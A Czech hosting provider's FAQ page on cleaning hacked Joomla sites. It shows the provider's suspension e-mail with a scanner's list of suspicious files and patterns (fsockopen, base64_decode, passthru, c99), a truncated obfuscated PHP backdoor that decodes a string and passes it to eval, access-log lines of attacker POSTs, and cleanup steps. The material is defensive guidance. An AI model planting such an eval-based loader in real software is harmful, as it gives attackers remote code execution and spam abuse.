Zavirovaný / hacknutý web

U neaktualizovaných redakčních systémů (nejčastěji Joomla) a neaktualizovaných modulů/komponent (nejčastěji JCEditor) se velice často stává, že si záškodníci bez vědomí provozovatele webu schovají do adresářové struktury soubory, přes které masivně rozesílají nevyžádanou poštu nebo útočí na cizí servery, nebo přímo zneužívají k odesílání/útočení neaktualizovaný modul/komponentu (např. v Prestashopu modul SendtoaFriend).

V důsledku toho musíme takový web pozastavit. Primárně přidáme/upravíme soubor .htaccess a .htpasswd, čímž zamezíme veřejný přístup na veškeré skripty bez znalosti přístupových údajů. Provozovatel webu má tedy možnost k webu dále přistupovat za účelem odstranění problému.

Pokud náš monitorovací systém zachytí masivní rozesílání spamu, dojde k takovému pozastavení automaticky a zákazníkovi je odeslán na kontaktní e-mail informační e-mail následujícího znění.

Dobrý den,

web www.nazev-vasi-domeny.cz byl kompromitován a byl zneužit k rozesílání spamu. Zřejmě se tak stalo z důvodu zastaralé verze aplikace nebo modulu, kde byla zneužita bezpečnostní chyba. Dále je možné, že se na webu nachází formulář (objednávka, diskuze, inzerce atd..), který není zabezpečen proti přístupu/registraci robotů - spammerů. V tomto připadě promažte Vaše uživatele a udělejte, nějaké opatření, aby k těmto přístupům/registracím nedocházelo (např. nutnost opsat kód z obrázku apod.), případně úplně vymažte php skripty / formulář.

Z výše uvedeného důvodu jsme zablokovali http komunikaci pro celý web vytvořením/modifikací souboru .htaccess (původní obsah najdete v záloze .htaccess_hosting_backup) a vytvořili soubor .htpasswd.

Přístupy pro odstranění problému:
---------------------------------
login: admin
heslo: vygenerované heslo
---------------------------------
Přístupy Vám zasíláme pro odstranění problému (např. odinstalovaní problémových modulů atd ..). Pokud soubory .htaccess a .htpasswd odstraníte bez vyřešení problému a zanecháte současný obsah webu, bude pozastavena celá doména (případně můžete smazat celý obsah webu včetně těchto souborů a začít novou instalací).

Současnou aplikaci i všechny moduly je potřeba vyčistit od škodlivých kódů, zaktualizovat a zabezpečit proti dalšímu zneužití. V případě obnovení ze zálohy prověřte i obsah zálohy. Prozkoumejte logy daného webu, které naleznete v administračním systému úplně dole. Nezapomeňte změnit veškerá hesla.

Návod na odstranění problému nejdete na adrese  https://faq.c4.cz/zavirovany-hacknuty-web

Nevíte-li si s řešením sami rady, můžete se obrátit na některého z našich partnerů (http://www.webhosting-c4.cz/tvorba-webovych-stranek), kteří Vám udělají cenovou nabídku.

Aplikaci je potřeba udržovat aktualizovanou. Pokud by došlo jen k částečnému vyřešení, mohla by se situace rychle opakovat a hrozilo by tak odstavení celé domény.

V poslední době rovněž dochází k masivnímu zkoušení hesel do webových aplikací a pokud je heslo (do Joomly) jednoduché (např. odpovídá slovu českého nebo anglického jazyka, je krátké apod.), tak je vysoká pravděpodobnost, že heslo bude zkompromitováno a zneužito.

Můžete se zaměřit na potencionálně kompromitované soubory níže, které nalezl náš automatizovaný system:
(Kompromitované soubory nestačí pouze smazat, je potřeba vyřešit bezpečnostní chybu která umožnila nahrání souborů na web)
------------------------------------------------------------------------------------------------------------------

/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/.htaccess: Suspicious(RewriteRule):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/modules/mod_wsbottomline/admin/wsovdo/ztlzy.php: Suspicious(\x47\x4c\x4f\x42):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/modules/mod_extrodomaincheck/mod_extrodomaincheck.php: Suspicious(fsockopen):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/templates/rivers/css/general.css: Suspicious(c99):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/cli/akeeba-altbackup.php: Suspicious(fsockopen):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/plugins/captcha/recaptcha/recaptcha.php: Suspicious(fsockopen):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/plugins/system/highlight/highlight.php: Suspicious(base64_decode):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/plugins/system/nnframework/helpers/protect.php: Suspicious(base64_decode):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/plugins/system/nnframework/helpers/tags.php: Suspicious(base64_decode):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/plugins/system/nnframework/helpers/functions.php: Suspicious(open_basedir):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/plugins/content/geshi/geshi/geshi/ini.php: Suspicious(hacker):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/plugins/content/geshi/geshi/geshi/php-brief.php: Suspicious(passthru):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/plugins/content/geshi/geshi/geshi/php.php: Suspicious(base64_decode):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/plugins/content/sigplus/services.php: Suspicious(open_basedir):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/components/com_weblinks/controllers/weblink.php: Suspicious(base64_decode):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/components/com_weblinks/models/form.php: Suspicious(base64_decode):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/vendor/phpmailer/phpmailer/class.smtp.php: Suspicious(fsockopen):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/vendor/phpmailer/phpmailer/class.pop3.php: Suspicious(fsockopen):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/vendor/phpmailer/phpmailer/class.phpmailer.php: Suspicious(root@):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/cms/html/select.php: Suspicious(hacked):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/joomla/application/daemon.php: Suspicious(passthru):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/joomla/client/ftp.php: Suspicious(fsockopen):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/joomla/http/transport/socket.php: Suspicious(fsockopen):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/joomla/http/transport/curl.php: Suspicious(open_basedir):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/joomla/filesystem/folder.php: Suspicious(open_basedir):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/simplepie/simplepie.php: Suspicious(fsockopen):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/idna_convert/uctc.php: Suspicious(base64_decode):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/fof/encrypt/aes.php: Suspicious(base64_decode):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/fof/utils/timer/footer.php: Suspicious(base64_decode):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/fof/controller/controller.php: Suspicious(base64_decode):
/data/www/nazev-vasi-domeny.cz/www.nazev-vasi-domeny.cz/libraries/fof/LICENSE.txt: Suspicious(Hacker):


--
S pozdravem

Webhosting C4
ČESKÝ WEBHOSTING s.r.o.
Tel: +420 234 139 876
E-mail: info@c4.cz
http://www.c4.cz



Projdete-li námi navrhované soubory, objevíte například v souboru libraries/fof/utils/timer/footer.php zakódovaný obsah, který je s velkou pravděpodobností příčinou problému.

Obsah souboru libraries/fof/utils/timer/footer.php

(Obsah byl zkrácen z 1949 na 28 řádek.)

<?php
 $uhesdxkyjb = 9826; function mlbcoosvyc($uvkbkzsse, $achgo){$rpivnb = ''; for($i=0; $i < strlen($uvkbkzsse); $i++){$rpivnb .= isset($achgo[$uvkbkzsse[$i]]) ? $achgo[$uvkbkzsse[$i]] : $uvkbkzsse[$i];}
$yjlsisesuv="base64_decode";return $yjlsisesuv($rpivnb);}
$onemsncx = 'yE9oPZwUTjy7qfZilWwijfGmTilHRQDZIQLg1LhByE9oPZwUTjy7qfGmTVw9lAq'.
'mlAeA6axLBIHSaMsgCW94lfZhBanO5jt4Tjt95rZhPKwojrbgCKvA6axLBIHSaMsUTj'.
'b4nE9OTZwHPKVgnaJLBIHSaJhBPK57PjSUTjy7qXwIbZqKbZRgByhBYLhBa8b4vhZ8ZM'.
'Z8Kiny8Xs4vhZebunnR0hJRuzu1ixSaJMMjVSXv9TXv9HAvMZSIVbXjhXQbXRAj8xwRaRGekloeapL6kQu1LhBaK9WBaX9Cjsh'.
'Y8JMjVSXv9TXv9HA8XbvvXw5jhTFv9nsvMbXbXwEIVRAj8Mg0y7qYLhBayMMjVSXv9TXv9HA8Xbv'.
'NBiLJe8Mg1LhBRaxJRaxJRaxMTKDkeuxwRcShlAsmliJMPfZDvrbi6as'.
'UnKqUncR7qE9olcZh6axMP8HN6axGB8Md0y7JRaxJRaxJRab9C'.
'iCre7qETiCfhg1LhBayMMTAqmC8xwRctonKV4CKXklWwUBabWlWwOBIHS'.
'aJMq0y7qaK9WRatUncqUncR7qETiCfhHRaqCyVZIZQwSj8RgR0hwRQTsIXSXByhBay9d0y'.
'7qayMMTAqmC8xwRETiCfV4PEwUnaJMTAqmC8Md0y7qajhSaJMqTKGUTyhBay9d0y7qayMMTAqmC8xwRcShl9wiT'.
'jsH5KS9BaqCyVZIZQwSj8RHRaRu6axMTAqmC8Md0y7qajhSaJMq0y7qa8bWlWwOjfZO5K9HR0hJTjtLCEwMT8JuF'.
.
.
.
.
.
'aRHRabWlWwOBIHSaJMqqETiCfV4TKVtPKLJF8s9YcsHCfb9BaR+RuLJqETiCfV4TKVtPK'.
'GCeZhg1LhBayMMTAqmCZwo5KV9R0hJTjtLCEwMT8JujaRu6axMTAqmC8Md0y7qa8bH5jS'.
'hjfZilWwiR0hJlfZoTXSOncsS5K9HBabWlWwOjfZO5K9HKUsn6ax'.
'MTAqmCZwo5KV9KUXn6axMTKVtPKLHRabhPEZOT8LJqEV9lrStTfvHRabM5jbtKinHnannBIHSaJMq0y7qaK9W'.
'RaJMCEXUnXw9lAqml9HGj8xwFIhJeaMSaJMqYLhBayMqqEnmCfyN'.
'BUHSaJMq4yhBay99CcS90y7qajHSaJMqa8bu5KyNBUHSaJMqa8bACfwMR0hJ5fwVCAy7qEbtnEXCqfvA'.
'j8MJ68xM5WXM1LhBay9w0y7q4yhBayhBa8biTjSCRARujZHunaqnR0hJqEGtlrb4Tjq'.
'iCrqCeXhd0y7qqcq9lVHuluqnKiq9R9hJF8xMCEXUnXw9lAqml9HGj8xwFIhJbMXev'.
'hvJFixLR07JqEGtlrb4TjqiCrqCeZhd0y7qqcq9lVHuluqnKiqAR9hJF8xMTfwmT0HSaJMMlWZUKiqiR9V'.
'CRWRuj8xwRabu5Kyd0y7SaJ9iTjbVlWpJlfZiPKXHPjg9BabiTjeg1LhB4yhB0y7M5'.
'fwoTW9AR0hJ5jqi5j94nWXHnKZUBab4vQwIZaMd0y7MlWZUR0hJnc9LTIX4lfZoTaJM5fwoTW9AKUsnBIH'.
'SaW9WRaJMlWZUB8sd0y7JRaxJTKS7CixMlWZU1LhB4yhB0yg9YE9hBaMd';
$ntbcyz = Array('1'=>'O', '0'=>'D', '3'=>'q', '2'=>'6', '5'=>'Y', '4'=>'f', '7'=>'o', '6'=>'L', '9'=>'l', '8'=>'S', 'A'=>'n', 'C'=>'b', 'B'=>'K', 'E'=>'G', 'D'=>'5', 'G'=>'x', 'F'=>'P', 'I'=>'T', 'H'=>'s', 'K'=>'W', 'J'=>'g', 'M'=>'k', 'L'=>'w', 'O'=>'t', 'N'=>'r', 'Q'=>'E', 'P'=>'a', 'S'=>'N', 'R'=>'I', 'U'=>'z', 'T'=>'Z', 'W'=>'m', 'V'=>'1', 'Y'=>'e', 'X'=>'F', 'Z'=>'V', 'a'=>'C', 'c'=>'H', 'b'=>'R', 'e'=>'M', 'd'=>'7', 'g'=>'p', 'f'=>'2', 'i'=>'y', 'h'=>'0', 'k'=>'j', 'j'=>'X', 'm'=>'v', 'l'=>'c', 'o'=>'u', 'n'=>'d', 'q'=>'J', 'p'=>'4', 's'=>'B', 'r'=>'3', 'u'=>'i', 't'=>'h', 'w'=>'9', 'v'=>'U', 'y'=>'Q', 'x'=>'A', 'z'=>'8');
eval/*dmdudhbq*/(mlbcoosvyc($onemsncx, $ntbcyz));?>


V access logu, který je přístupný v administračním systému hostingových služeb, lze vidět, že mnoho IP adres přistupuje k souboru /libraries/fof/utils/timer/footer.php

.
.
2607:5300:60:6fa0:: - - [01/Jun/2016:11:08:17 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
198.71.236.65 - - [01/Jun/2016:11:11:11 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
107.170.162.190 - - [01/Jun/2016:11:14:40 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 500 537 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
2400:8900::f03c:91ff:fe89:13c1 - - [01/Jun/2016:11:14:49 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
91.212.89.66 - - [01/Jun/2016:11:17:52 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
200.6.251.98 - - [01/Jun/2016:11:18:55 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
107.170.162.190 - - [01/Jun/2016:11:19:14 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
66.147.244.196 - - [01/Jun/2016:11:22:33 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
72.167.131.151 - - [01/Jun/2016:11:22:54 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
50.63.194.51 - - [01/Jun/2016:11:23:16 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
202.28.77.183 - - [01/Jun/2016:11:25:53 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
66.147.244.85 - - [01/Jun/2016:11:25:50 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
50.62.176.83 - - [01/Jun/2016:11:27:53 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
91.239.67.175 - - [01/Jun/2016:11:29:09 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
122.155.17.190 - - [01/Jun/2016:11:31:03 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
192.185.82.153 - - [01/Jun/2016:11:33:53 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
50.87.249.70 - - [01/Jun/2016:11:36:11 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
173.201.196.89 - - [01/Jun/2016:11:37:07 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
5.101.157.27 - - [01/Jun/2016:11:39:00 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
2a00:1ed0:1:500::a026 - - [01/Jun/2016:11:39:09 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
182.50.130.150 - - [01/Jun/2016:11:40:35 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
66.147.244.242 - - [01/Jun/2016:11:41:58 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
184.168.46.223 - - [01/Jun/2016:11:42:29 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
77.246.156.85 - - [01/Jun/2016:11:44:53 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
50.62.161.163 - - [01/Jun/2016:11:45:49 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
217.170.198.12 - - [01/Jun/2016:11:46:57 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
82.200.247.241 - - [01/Jun/2016:11:49:09 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
184.168.200.153 - - [01/Jun/2016:11:49:47 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
91.201.52.58 - - [01/Jun/2016:11:52:28 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
173.201.196.202 - - [01/Jun/2016:11:53:33 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 200 69 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) U2/1.0.0 UCBrowser/9.3.1.344"
193.106.248.114 - - [01/Jun/2016:11:54:58 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 401 41 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.48 Safari/537.36"
2001:41d0:a:1386::1 - - [01/Jun/2016:11:55:46 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 401 41 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
50.62.176.26 - - [01/Jun/2016:11:57:50 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 401 41 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0"
208.109.181.199 - - [01/Jun/2016:11:57:55 +0200] "POST /libraries/fof/utils/timer/footer.php HTTP/1.0" 401 41 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:29.0) Gecko/20100101 Firefox/29.0 SeaMonkey/2.26"
.
.

Postup odvirování

  • Zaktualizujte redakční systém a používané moduly/komponenty. Ty, které nepoužíváte, pokud možno odinstalujte a zkontrolujte, zda se již nenachází na FTP. Vypnutí závadné komponenty v provozovaném systému nestačí.
  • Projděte access log (najdete ho v administračním systému hostingových služeb) v čase, kdy vám byl web pozastavený. Najdete tam podezřelé přístupy, jako v našem případě na soubor /libraries/fof/utils/timer/footer.php, v jiném případě problému - s modulem SendtoaFriend pro Prestashop jsou přístupy na soubor /modules/sendtoafriend/sendtoafriend_ajax.php.
  • Projděte soubory, které jsme vám poslali v informačním e-mailu o odstavení služeb. Bude-li některý soubor obsahovat zakódovaný obsah, jako v našem případě soubor /libraries/fof/utils/timer/footer.php, jedná se s velkou pravděpodobností o příčinu problému.
  • Porovnejte datum a čas souboru s ostatními soubory ve stejném nebo blízkém adresáři. Záškodnické soubory mají obvykle jiný datum/čas.
  • Podezřelé soubory zazálohujte přes FTP do lokálního počítače a na web serveru je smažte.
  • Přejmenujte námi zazálohovaný soubor .htaccess_hosting_backup na .htaccess a smažte soubor .htpasswd. Tím web opět zpřístupníte všem návštěvníkům.

V případě, že opakovaně přístup na web odblokujete bez vyřešení problému, pozastavíme provoz celé domény.

Informace k zavirované Joomle 1.5 najdete na stránce navody.c4.cz/joomla-1-5-odvirovani-napadenych-stranek.
Jak nastavit heslo pro přístup do adresáře /administrator aplikace Joomla 1.5 najdete na stránce navody.c4.cz/joomla-zabezpeceni-administrace.